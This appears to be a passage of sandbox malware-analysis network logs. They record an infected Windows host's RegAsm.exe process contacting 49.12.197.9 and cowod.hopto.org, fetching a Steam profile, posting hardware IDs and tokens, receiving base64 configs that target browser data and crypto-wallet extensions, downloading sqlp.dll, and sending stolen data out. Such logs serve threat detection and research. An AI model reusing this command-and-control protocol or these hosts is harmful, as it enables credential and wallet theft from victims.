                                                                                                                                                      Oct 3, 2024 09:16:43.417119980 CEST1236INData Raw: a1 0b 0d a6 28 cf 75 40 1a 14 4c 7e 18 17 b0 6a 45 97 ce dd 44 88 f5 41 f9 a9 50 10 e3 5f 0d 97 97 7a 0a 09 cc c9 0f f2 35 85 9c 63 db 02 fc 3f d6 8a 37 49 7e 96 ca 50 8d 5d fb e3 d0 35 89 10 e3 ce 8d 92 9e 05 d4 e0 35 1b 46 75 fa ed d4 09 09 5f
                                                                                                                                                      Data Ascii: (u@L~jEDAP_z5c?7I~P]55Fu_s"u!Y'JC0?b(RF!?4rkR;ASX'Br;\YPYW&?D=VVF {QiLCr_q(wKF~!]Bu}~`6'
                                                                                                                                                      Oct 3, 2024 09:16:43.421232939 CEST1236INData Raw: 13 6f d7 83 b4 45 a8 cb 18 30 f2 09 f2 0a 00 57 4d 46 55 bf db 91 bd 4f c5 39 30 c0 63 a1 ec 8b c4 6c a3 b9 0c 3e 63 ee 74 48 ef 12 bb 7e 35 c4 9d b1 5a 67 96 0e bf b0 ce fe 0e ec 2b d9 2a 63 88 1c b0 43 c2 5e 6f f1 34 1f 1b 89 b8 c9 aa fa dd 36
                                                                                                                                                      Data Ascii: oE0WMFUO90cl>ctH~5Zg+*cC^o46Hp`|OSN;PHnp&"d#VVB{oS5kN)Q<hH33gXp#=x^w~tD !-rHt3BrT@[S+F~rC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49751 | 45.132.206.251 | 80 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 09:16:47.298543930 CEST | 281 | OUT | POST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: cowod.hopto.org
                                                                                                                                                      Content-Length: 3157
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Oct 3, 2024 09:16:47.298594952 CEST3157OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36
                                                                                                                                                      Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------FCAAEBFHJJDAAK
Oct 3, 2024 09:16:48.158515930 CEST | 188 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: openresty
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:47 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      X-Served-By: cowod.hopto.org


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49720 | 104.102.49.254 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:07 UTC | 119 | OUT | GET /profiles/76561199780418869 HTTP/1.1
                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
2024-10-03 07:16:07 UTC | 1870 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:07 GMT
                                                                                                                                                      Content-Length: 34879
                                                                                                                                                      Connection: close
                                                                                                                                                      Set-Cookie: sessionid=349f23963855c507010ce2ac; Path=/; Secure; SameSite=None
                                                                                                                                                      Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49721 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:09 UTC | 184 | OUT | GET / HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
2024-10-03 07:16:09 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:09 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
2024-10-03 07:16:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49722 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:10 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 256
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:10 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 43 42 41 45 43 46 43 41 4b 4b 45 42 46 43 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 34 38 37 37 36 38 45 30 43 43 39 33 37 34 30 31 30 35 32 38 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 42 41 45 43 46 43 41 4b 4b 45 42 46 43 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 42 41 45 43 46 43 41 4b 4b 45 42 46 43 46 49 49 2d 2d 0d
                                                                                                                                                      Data Ascii: ------GCGCBAECFCAKKEBFCFIIContent-Disposition: form-data; name="hwid"7487768E0CC93740105281-a33c7340-61ca------GCGCBAECFCAKKEBFCFIIContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------GCGCBAECFCAKKEBFCFII--
2024-10-03 07:16:10 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:10 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:10 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 3a1|1|1|1|039b7602cef4e610f9251887c9a84f91|1|1|1|0|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49723 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:11 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAA
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 331
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:11 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------GCFIIEBKEGHJJJJJJDAACont
2024-10-03 07:16:12 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:12 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:12 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                      Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49724 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:12 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKF
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 331
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:12 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------BGDBAKFCFHCGDGCBAAKFCont
2024-10-03 07:16:13 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:13 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:13 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                      Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49725 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:14 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 332
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:14 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------AAKKFHCFIECAAAKEGCFICont
2024-10-03 07:16:15 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:14 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-10-03 07:16:15 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49726 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:15 UTC | 277 | OUT | POST / HTTP/1.1
                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Content-Length: 5669
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      2024-10-03 07:16:15 UTC5669OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 33 39 62 37 36 30 32 63 65 66 34 65 36 31 30 66 39 32 35 31 38 38 37 63 39 61 38 34 66 39 31 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 62 37 33 31 30 65 61 62 34 32 34 35 30 30 36 66 31 32 35 63 34 34 32 64 61 32 64 31 65 35 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74
                                                                                                                                                      Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="token"039b7602cef4e610f9251887c9a84f91------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build_id"bb7310eab4245006f125c442da2d1e50------HJJJDAEGIDHCBFHJJJEGCont
2024-10-03 07:16:16 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:16 GMT
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      Connection: close
2024-10-03 07:16:16 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49727 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:16 UTC | 192 | OUT | GET /sqlp.dll HTTP/1.1
                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                      Host: 49.12.197.9
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cache-Control: no-cache
2024-10-03 07:16:17 UTC | 263 | IN | HTTP/1.1 200 OK
                                                                                                                                                      Server: nginx
                                                                                                                                                      Date: Thu, 03 Oct 2024 07:16:16 GMT
                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                      Content-Length: 2459136
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Thursday, 03-Oct-2024 07:16:16 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49728 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:19 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 829
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 07:16:19 UTC | 829 | OUT | Data Ascii:
------JDGHIIJKEBGIDHIDBKJD
Content-Disposition: form-data; name="token"

039b7602cef4e610f9251887c9a84f91
------JDGHIIJKEBGIDHIDBKJD
Content-Disposition: form-data; name="build_id"

bb7310eab4245006f125c442da2d1e50
------JDGHIIJKEBGIDHIDBKJD
Cont
2024-10-03 07:16:20 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 07:16:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 07:16:20 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49729 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:20 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 07:16:20 UTC | 437 | OUT | Data Ascii:
------HJJJDAEGIDHCBFHJJJEG
Content-Disposition: form-data; name="token"

039b7602cef4e610f9251887c9a84f91
------HJJJDAEGIDHCBFHJJJEG
Content-Disposition: form-data; name="build_id"

bb7310eab4245006f125c442da2d1e50
------HJJJDAEGIDHCBFHJJJEG
Cont
2024-10-03 07:16:21 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 07:16:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 07:16:21 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49730 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 07:16:21 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 07:16:21 UTC | 437 | OUT | Data Ascii:
------FCAAEBFHJJDAAKFIECGD
Content-Disposition: form-data; name="token"

039b7602cef4e610f9251887c9a84f91
------FCAAEBFHJJDAAKFIECGD
Content-Disposition: form-data; name="build_id"

bb7310eab4245006f125c442da2d1e50
------FCAAEBFHJJDAAKFIECGD
Cont
2024-10-03 07:16:22 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 07:16:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 07:16:22 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49731 | 49.12.197.9 | 443 | 6880 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
